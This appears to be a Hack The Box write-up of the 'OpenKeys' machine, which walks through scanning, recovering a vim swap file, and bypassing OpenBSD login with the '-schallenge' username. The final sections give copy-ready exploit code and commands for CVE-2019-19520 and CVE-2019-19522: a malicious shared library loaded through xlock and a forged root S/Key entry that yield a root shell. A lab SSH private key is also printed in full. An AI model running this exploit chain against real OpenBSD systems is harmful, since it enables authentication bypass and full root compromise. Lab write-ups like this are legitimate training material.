I"p<blockquote>
  <p><strong>Any actions and or activities related to the material contained within this Website is solely your responsibility. This site contains materials that can be potentially damaging or dangerous. If you do not fully understand something on this site, then GO OUT OF HERE! Refer to the laws in your province/country before accessing, using,or in any other way utilizing these materials.These materials are for educational and research purposes only.</strong></p>
</blockquote>

<h2 id="summary"><strong><span style="color:#E70B0B">Summary</span></strong></h2>
<hr />

<ul>
  <li>Need to recover auth.php with <code class="language-plaintext highlighter-rouge">vim</code>.</li>
  <li>Exploit authentication bypass vulnerability OpenBSD with <code class="language-plaintext highlighter-rouge">-schallenge</code> as the credential for the username.</li>
  <li>Create a username with the value <code class="language-plaintext highlighter-rouge">jennifer</code> in order to get <code class="language-plaintext highlighter-rouge">ssh</code> private key of the user.</li>
  <li>Execute <code class="language-plaintext highlighter-rouge">OpenBSD</code> exploit <code class="language-plaintext highlighter-rouge">CVE-2019-19521</code> to get <strong>root</strong>.</li>
</ul>

<h2 id="port-scans"><strong><span style="color:#E70B0B">Port Scans</span></strong></h2>
<hr />

<div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
</pre></td> --><td class="rouge-code"><pre><span class="gp">root@lordrhovelionz:~/htb/openkeys#</span><span class="w"> </span>nmap <span class="nt">-sCV</span> <span class="nt">-T4</span> openkeys.htb <span class="nt">-oA</span> nmap/output
<span class="go">Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-10 09:20 WIB
Nmap scan report for openkeys.htb (10.10.10.199)
Host is up (0.11s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.1 (protocol 2.0)
| ssh-hostkey: 
|   3072 5e:ff:81:e9:1f:9b:f8:9a:25:df:5d:82:1a:dd:7a:81 (RSA)
|   256 64:7a:5a:52:85:c5:6d:d5:4a:6b:a7:1a:9a:8a:b9:bb (ECDSA)
|_  256 12:35:4b:6e:23:09:dc:ea:00:8c:72:20:c7:50:32:f3 (ED25519)
80/tcp open  http    OpenBSD httpd
|_http-title: Site doesn't have a title (text/html).

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.97 seconds
</span></pre></td></tr></tbody></table></code></pre></div></div>

<h2 id="website"><strong><span style="color:#E70B0B">Website</span></strong></h2>
<hr />

<p>We have login page on <code class="language-plaintext highlighter-rouge">index.php</code></p>

<p><img src="/images/htb/openkeys/loginpage.png" alt="" /></p>

<p>I tried few default <code class="language-plaintext highlighter-rouge">credential</code> with no luck.</p>

<p><img src="/images/htb/openkeys/loginpagefailed.png" alt="" /></p>

<h2 id="fuzzing"><strong><span style="color:#E70B0B">Fuzzing</span></strong></h2>
<hr />

<div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
</pre></td> --><td class="rouge-code"><pre><span class="gp">root@lordrhovelionz:~/htb/openkeys#</span><span class="w"> </span>gobuster <span class="nb">dir</span> <span class="nt">-u</span> 10.10.10.199 <span class="nt">-w</span> /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt <span class="nt">-x</span> php,txt <span class="nt">-t</span> 100
<span class="go">===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.199
[+] Threads:        100
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,txt
[+] Timeout:        10s
===============================================================
2020/08/10 09:21:58 Starting gobuster
===============================================================
/index.php (Status: 200)
/images (Status: 301)
/css (Status: 301)
/includes (Status: 301)
/js (Status: 301)
/vendor (Status: 301)
/fonts (Status: 301)
</span></pre></td></tr></tbody></table></code></pre></div></div>

<p>Browse openkeys.htb/includes/ and found there are <code class="language-plaintext highlighter-rouge">2 files</code></p>

<p><img src="/images/htb/openkeys/includes-dir.png" alt="" /></p>

<h2 id="swap-file"><strong><span style="color:#E70B0B">Swap file</span></strong></h2>
<hr />

<p>I downloaded the file using <code class="language-plaintext highlighter-rouge">wget</code></p>

<div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
</pre></td> --><td class="rouge-code"><pre><span class="gp">root@lordrhovelionz:~/htb/openkeys#</span><span class="w"> </span>wget http://10.10.10.199/includes/auth.php.swp
<span class="go">--2020-08-10 09:28:53--  http://10.10.10.199/includes/auth.php.swp
Connecting to 10.10.10.199:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: ‘auth.php.swp.1’

</span><span class="gp">auth.php.swp.1                                          [  &lt;=&gt;</span><span class="w">                                                                                                              </span><span class="o">]</span>  12.00K  47.3KB/s    <span class="k">in </span>0.3s    
<span class="go">
2020-08-10 09:28:54 (47.3 KB/s) - ‘auth.php.swp.1’ saved [12288]

</span><span class="gp">root@lordrhovelionz:~/htb/openkeys#</span><span class="w"> 
</span></pre></td></tr></tbody></table></code></pre></div></div>

<p>Identify the file with command <code class="language-plaintext highlighter-rouge">file</code>, it shows username <code class="language-plaintext highlighter-rouge">jennifer</code></p>

<div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td> --><td class="rouge-code"><pre><span class="gp">root@lordrhovelionz:~/htb/openkeys#</span><span class="w"> </span>file auth.php.swp
<span class="go">auth.php.swp: Vim swap file, version 8.1, pid 49850, user jennifer, host openkeys.htb, file /var/www/htdocs/includes/auth.php
</span><span class="gp">root@lordrhovelionz:~/htb/openkeys#</span><span class="w"> 
</span></pre></td></tr></tbody></table></code></pre></div></div>

<p>I tried to executed it but the file is broken</p>
<div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
</pre></td> --><td class="rouge-code"><pre><span class="gp">root@lordrhovelionz:~/htb/openkeys#</span><span class="w"> </span>less auth.php.swp
<span class="go">"auth.php.swp" may be a binary file.  See it anyway? 
</span></pre></td></tr></tbody></table></code></pre></div></div>

<p>So I recovered it.</p>
<div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
</pre></td> --><td class="rouge-code"><pre><span class="gp">vim -r auth.php.swp -&gt;</span><span class="w"> </span>save it
</pre></td></tr></tbody></table></code></pre></div></div>

<p>And now I can read the php code</p>

<div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
</pre></td> --><td class="rouge-code"><pre><span class="cp">&lt;?php</span>
<span class="k">function</span> <span class="n">authenticate</span><span class="p">(</span><span class="nv">$username</span><span class="p">,</span> <span class="nv">$password</span><span class="p">)</span>
    <span class="nv">$cmd</span> <span class="o">=</span> <span class="nb">escapeshellcmd</span><span class="p">(</span><span class="s2">"../auth_helpers/check_auth "</span> <span class="mf">.</span> <span class="nv">$username</span> <span class="mf">.</span> <span class="s2">" "</span> <span class="mf">.</span> <span class="nv">$password</span><span class="p">);</span>
    <span class="nb">system</span><span class="p">(</span><span class="nv">$cmd</span><span class="p">,</span> <span class="nv">$retcode</span><span class="p">);</span>
    <span class="k">return</span> <span class="nv">$retcode</span><span class="p">;</span>
<span class="k">function</span> <span class="n">is_active_session</span><span class="p">()</span>
    <span class="c1">// Session timeout in seconds</span>
    <span class="nv">$session_timeout</span> <span class="o">=</span> <span class="mi">300</span><span class="p">;</span>
    <span class="c1">// Start the session</span>
    <span class="nb">session_start</span><span class="p">();</span>
    <span class="c1">// Is the user logged in? </span>
    <span class="k">if</span><span class="p">(</span><span class="k">isset</span><span class="p">(</span><span class="nv">$_SESSION</span><span class="p">[</span><span class="s2">"logged_in"</span><span class="p">]))</span>
    <span class="p">{</span>
        <span class="c1">// Has the session expired?</span>
        <span class="nv">$time</span> <span class="o">=</span> <span class="nv">$_SERVER</span><span class="p">[</span><span class="s1">'REQUEST_TIME'</span><span class="p">];</span>
        <span class="k">if</span> <span class="p">(</span><span class="k">isset</span><span class="p">(</span><span class="nv">$_SESSION</span><span class="p">[</span><span class="s1">'last_activity'</span><span class="p">])</span> <span class="o">&amp;&amp;</span> 
            <span class="p">(</span><span class="nv">$time</span> <span class="o">-</span> <span class="nv">$_SESSION</span><span class="p">[</span><span class="s1">'last_activity'</span><span class="p">])</span> <span class="o">&gt;</span> <span class="nv">$session_timeout</span><span class="p">)</span>
        <span class="p">{</span>
            <span class="nf">close_session</span><span class="p">();</span>
            <span class="k">return</span> <span class="kc">False</span><span class="p">;</span>
        <span class="p">}</span>
        <span class="k">else</span>
        <span class="p">{</span>
            <span class="c1">// Session is active, update last activity time and return True</span>
            <span class="nv">$_SESSION</span><span class="p">[</span><span class="s1">'last_activity'</span><span class="p">]</span> <span class="o">=</span> <span class="nv">$time</span><span class="p">;</span>
            <span class="k">return</span> <span class="kc">True</span><span class="p">;</span>
        <span class="p">}</span>
    <span class="p">}</span>
    <span class="k">else</span>
    <span class="p">{</span>
        <span class="k">return</span> <span class="kc">False</span><span class="p">;</span>
    <span class="p">}</span>
<span class="k">function</span> <span class="n">init_session</span><span class="p">()</span>
    <span class="nv">$_SESSION</span><span class="p">[</span><span class="s2">"logged_in"</span><span class="p">]</span> <span class="o">=</span> <span class="kc">True</span><span class="p">;</span>
    <span class="nv">$_SESSION</span><span class="p">[</span><span class="s2">"login_time"</span><span class="p">]</span> <span class="o">=</span> <span class="nv">$_SERVER</span><span class="p">[</span><span class="s1">'REQUEST_TIME'</span><span class="p">];</span>
    <span class="nv">$_SESSION</span><span class="p">[</span><span class="s2">"last_activity"</span><span class="p">]</span> <span class="o">=</span> <span class="nv">$_SERVER</span><span class="p">[</span><span class="s1">'REQUEST_TIME'</span><span class="p">];</span>
    <span class="nv">$_SESSION</span><span class="p">[</span><span class="s2">"remote_addr"</span><span class="p">]</span> <span class="o">=</span> <span class="nv">$_SERVER</span><span class="p">[</span><span class="s1">'REMOTE_ADDR'</span><span class="p">];</span>
    <span class="nv">$_SESSION</span><span class="p">[</span><span class="s2">"user_agent"</span><span class="p">]</span> <span class="o">=</span> <span class="nv">$_SERVER</span><span class="p">[</span><span class="s1">'HTTP_USER_AGENT'</span><span class="p">];</span>
    <span class="nv">$_SESSION</span><span class="p">[</span><span class="s2">"username"</span><span class="p">]</span> <span class="o">=</span> <span class="nv">$_REQUEST</span><span class="p">[</span><span class="s1">'username'</span><span class="p">];</span>
<span class="k">function</span> <span class="n">close_session</span><span class="p">()</span>
    <span class="kt">session_unset</span><span class="p">();</span>
    <span class="nb">session_destroy</span><span class="p">();</span>
    <span class="nb">session_start</span><span class="p">();</span>
<span class="cp">?&gt;</span>
</pre></td></tr></tbody></table></code></pre></div></div>

<h2 id="check-auth_binary"><strong><span style="color:#E70B0B">Check auth_binary</span></strong></h2>
<hr />

<p>Found something on line 3 of the php code, I found that <code class="language-plaintext highlighter-rouge">../auth_helpers/check_auth</code> seems accessible.</p>

<p><img src="/images/htb/openkeys/auth-helpers.png" alt="" /></p>

<p>I downloaded the <code class="language-plaintext highlighter-rouge">check_auth</code> using <code class="language-plaintext highlighter-rouge">wget</code></p>

<div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
</pre></td> --><td class="rouge-code"><pre><span class="gp">root@lordrhovelionz:~/htb/openkeys#</span><span class="w"> </span>wget http://10.10.10.199/auth_helpers/check_auth
<span class="go">--2020-08-10 09:38:48--  http://10.10.10.199/auth_helpers/check_auth
Connecting to 10.10.10.199:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 12288 (12K) [application/octet-stream]
Saving to: ‘check_auth’

</span><span class="gp">check_auth                                          100%[==================================================================================================================&gt;</span><span class="o">]</span>  12.00K  39.3KB/s    <span class="k">in </span>0.3s    
<span class="go">
2020-08-10 09:38:49 (39.3 KB/s) - ‘check_auth’ saved [12288/12288]

</span><span class="gp">root@lordrhovelionz:~/htb/openkeys#</span><span class="w"> 
</span></pre></td></tr></tbody></table></code></pre></div></div>

<p>Identify it with <code class="language-plaintext highlighter-rouge">file</code> commands, it shows its <strong>binary</strong> 64-bit.</p>

<div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td> --><td class="rouge-code"><pre><span class="gp">root@lordrhovelionz:~/htb/openkeys#</span><span class="w"> </span>file check_auth 
<span class="go">check_auth: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /usr/libexec/ld.so, for OpenBSD, not stripped
</span><span class="gp">root@lordrhovelionz:~/htb/openkeys#</span><span class="w"> 
</span></pre></td></tr></tbody></table></code></pre></div></div>

<p>I tried reversing the <code class="language-plaintext highlighter-rouge">check_auth</code> binary with <strong>ida_pro</strong> and the decompiled code did not give anything useful.</p>

<p>At this point I have no idea what to do since I don’t know much about <code class="language-plaintext highlighter-rouge">OpenBSD</code>, while doing research, I found that an article that points out <code class="language-plaintext highlighter-rouge">-schallenge</code> is a potential <strong>username</strong> to login with any <code class="language-plaintext highlighter-rouge">arbitrary</code> password.</p>

<blockquote>
  <p><a href="https://thehackernews.com/2019/12/openbsd-authentication-vulnerability.html">Article with PoC</a></p>
</blockquote>

<p><img src="/images/htb/openkeys/opensshkeyfound.png" alt="" /></p>

<h2 id="edit-cookie"><strong><span style="color:#E70B0B">Edit cookie</span></strong></h2>
<hr />

<p>the swap file shows that <code class="language-plaintext highlighter-rouge">jennifer</code>, so we put it as <code class="language-plaintext highlighter-rouge">value</code> in the cookie editor.</p>

<p><img src="/images/htb/openkeys/cookie-editor.png" alt="" /></p>

<p>After saved it, I tried to login again with <code class="language-plaintext highlighter-rouge">-schallenge</code>, we found <code class="language-plaintext highlighter-rouge">jennifer's</code> private-key.</p>

<div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
</pre></td> --><td class="rouge-code"><pre><span class="gp">root@lordrhovelionz:~/htb/openkeys#</span><span class="w"> </span><span class="nb">cat </span>jennifer_rsa
<span class="go">-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----
</span><span class="gp">root@lordrhovelionz:~/htb/openkeys#</span><span class="w"> 
</span></pre></td></tr></tbody></table></code></pre></div></div>
<h2 id="ssh-as-jennifer"><strong><span style="color:#E70B0B">SSH as jennifer</span></strong></h2>
<hr />

<div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
</pre></td> --><td class="rouge-code"><pre><span class="gp">root@lordrhovelionz:~/htb/openkeys#</span><span class="w"> </span><span class="nb">chmod </span>600 jennifer_rsa 
<span class="gp">root@lordrhovelionz:~/htb/openkeys#</span><span class="w"> </span>ssh <span class="nt">-i</span> jennifer_rsa jennifer@openkeys.htb
<span class="go">Last login: Sun Aug  9 14:13:58 2020 from 10.10.14.65
</span><span class="gp">OpenBSD 6.6 (GENERIC) #</span>353: Sat Oct 12 10:45:56 MDT 2019
<span class="go">
Welcome to OpenBSD: The proactively secure Unix-like operating system.

Please use the sendbug(1) utility to report bugs in the system.
Before reporting a bug, please try to reproduce it with the latest
version of the code.  With bug reports, please try to ensure that
enough information to reproduce the problem is enclosed, and if a
known fix for it exists, include that as well.

</span><span class="gp">openkeys$</span><span class="w"> </span><span class="nb">ls</span> <span class="nt">-la</span>
<span class="go">total 364
drwxr-xr-x  3 jennifer  jennifer     512 Aug  9 14:27 .
drwxr-xr-x  3 root      wheel        512 Jan 13  2020 ..
-rw-r--r--  1 jennifer  jennifer      87 Jan 13  2020 .Xdefaults
-rw-r--r--  1 jennifer  jennifer     771 Jan 13  2020 .cshrc
-rw-r--r--  1 jennifer  jennifer     101 Jan 13  2020 .cvsrc
-rw-r--r--  1 jennifer  jennifer     359 Jan 13  2020 .login
-rw-r--r--  1 jennifer  jennifer     175 Jan 13  2020 .mailrc
-rw-r--r--  1 jennifer  jennifer     215 Jan 13  2020 .profile
drwx------  2 jennifer  jennifer     512 Jan 13  2020 .ssh
-rwxr-xr-x  1 jennifer  jennifer    4087 Aug  9 14:26 CVE-2019-19520.sh
-rwxr-xr-x  1 jennifer  jennifer  161009 Aug  9 14:16 linpeas.sh
-rw-r-----  1 jennifer  jennifer      33 Jan 14  2020 user.txt
</span></pre></td></tr></tbody></table></code></pre></div></div>

<div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td> --><td class="rouge-code"><pre><span class="gp">openkeys$</span><span class="w"> </span><span class="nb">cat </span>user.txt
<span class="go">36ab21239a15c537bde90626891d2b10
</span><span class="gp">openkeys$</span><span class="w"> 
</span></pre></td></tr></tbody></table></code></pre></div></div>

<h2 id="escalating-to-root"><strong><span style="color:#E70B0B">Escalating to root</span></strong></h2>
<hr />

<p>I found great article about the exploitation and it has 3 <code class="language-plaintext highlighter-rouge">CVEs</code>
<a href="https://www.qualys.com/2019/12/04/cve-2019-19521/authentication-vulnerabilities-openbsd.txt">Exploits</a></p>

<p>There are 3 <code class="language-plaintext highlighter-rouge">CVEs</code> to get root, I used <code class="language-plaintext highlighter-rouge">CVE-2019-19520</code> &amp; <code class="language-plaintext highlighter-rouge">CVE-2019-19522</code> which both of them are related to each other, in order to get root, we have to executed <code class="language-plaintext highlighter-rouge">CVE-2019-19520</code> before <code class="language-plaintext highlighter-rouge">CVE-2019-19522</code>.</p>

<div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
</pre></td> --><td class="rouge-code"><pre><span class="gp">$</span><span class="w"> </span><span class="nb">id</span>
<span class="go">uid=32767(nobody) gid=32767(nobody) groups=32767(nobody)

</span><span class="gp">$</span><span class="w"> </span><span class="nb">cd</span> /tmp
<span class="go">
</span><span class="gp">$</span><span class="w"> </span><span class="nb">cat</span> <span class="o">&gt;</span> swrast_dri.c <span class="o">&lt;&lt;</span> <span class="sh">"</span><span class="no">EOF</span><span class="sh">"
</span><span class="gp">#</span><span class="sh">include &lt;paths.h&gt;
</span><span class="gp">#</span><span class="sh">include &lt;sys/types.h&gt;
</span><span class="gp">#</span><span class="sh">include &lt;unistd.h&gt;
</span><span class="go">
static void __attribute__ ((constructor)) _init (void) {
</span><span class="gp">    gid_t rgid, egid, sgid;</span><span class="w">
</span><span class="gp">    if (getresgid(&amp;rgid, &amp;egid, &amp;sgid) != 0) _exit(__LINE__);</span><span class="w">
</span><span class="gp">    if (setresgid(sgid, sgid, sgid) != 0) _exit(__LINE__);</span><span class="w">
</span><span class="go">
</span><span class="gp">    char * const argv[] = { _PATH_KSHELL, NULL };</span><span class="w">
</span><span class="gp">    execve(argv[0], argv, NULL);</span><span class="w">
</span><span class="gp">    _exit(__LINE__);</span><span class="w">
</span><span class="go">}
EOF

</span><span class="gp">$</span><span class="w"> </span>gcc <span class="nt">-fpic</span> <span class="nt">-shared</span> <span class="nt">-s</span> <span class="nt">-o</span> swrast_dri.so swrast_dri.c
<span class="go">
</span><span class="gp">$</span><span class="w"> </span><span class="nb">env</span> <span class="nt">-i</span> /usr/X11R6/bin/Xvfb :66 <span class="nt">-cc</span> 0 &amp;
<span class="go">[1] 2706

</span><span class="gp">$</span><span class="w"> </span><span class="nb">env</span> <span class="nt">-i</span> <span class="nv">LIBGL_DRIVERS_PATH</span><span class="o">=</span><span class="nb">.</span> /usr/X11R6/bin/xlock <span class="nt">-display</span> :66
<span class="go">
</span><span class="gp">$</span><span class="w"> </span><span class="nb">id</span>
<span class="go">uid=32767(nobody) gid=11(auth) groups=32767(nobody)
</span></pre></td></tr></tbody></table></code></pre></div></div>

<p>And now continue with the next <code class="language-plaintext highlighter-rouge">CVE</code>, it asked for password, simply input <code class="language-plaintext highlighter-rouge">EGG LARD GROW HOG DRAG LAIN</code></p>

<div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
</pre></td> --><td class="rouge-code"><pre><span class="gp">$</span><span class="w"> </span><span class="nb">id</span>
<span class="go">uid=32767(nobody) gid=11(auth) groups=32767(nobody)

</span><span class="gp">$</span><span class="w"> </span><span class="nb">echo</span> <span class="s1">'root md5 0100 obsd91335 8b6d96e0ef1b1c21'</span> <span class="o">&gt;</span> /etc/skey/root
<span class="go">
</span><span class="gp">$</span><span class="w"> </span><span class="nb">chmod </span>0600 /etc/skey/root
<span class="go">
</span><span class="gp">$</span><span class="w"> </span><span class="nb">env</span> <span class="nt">-i</span> <span class="nv">TERM</span><span class="o">=</span>vt220 su <span class="nt">-l</span> <span class="nt">-a</span> skey
<span class="go">otp-md5 99 obsd91335
S/Key Password: EGG LARD GROW HOG DRAG LAIN

</span><span class="gp">#</span><span class="w"> </span><span class="nb">id</span>
<span class="go">uid=0(root) gid=0(wheel)
</span></pre></td></tr></tbody></table></code></pre></div></div>

<p><img src="/images/htb/openkeys/roottxt.png" alt="" /></p>

<hr />

<p><img src="/images/mandatory/pwned.png" alt="" /></p>

:ET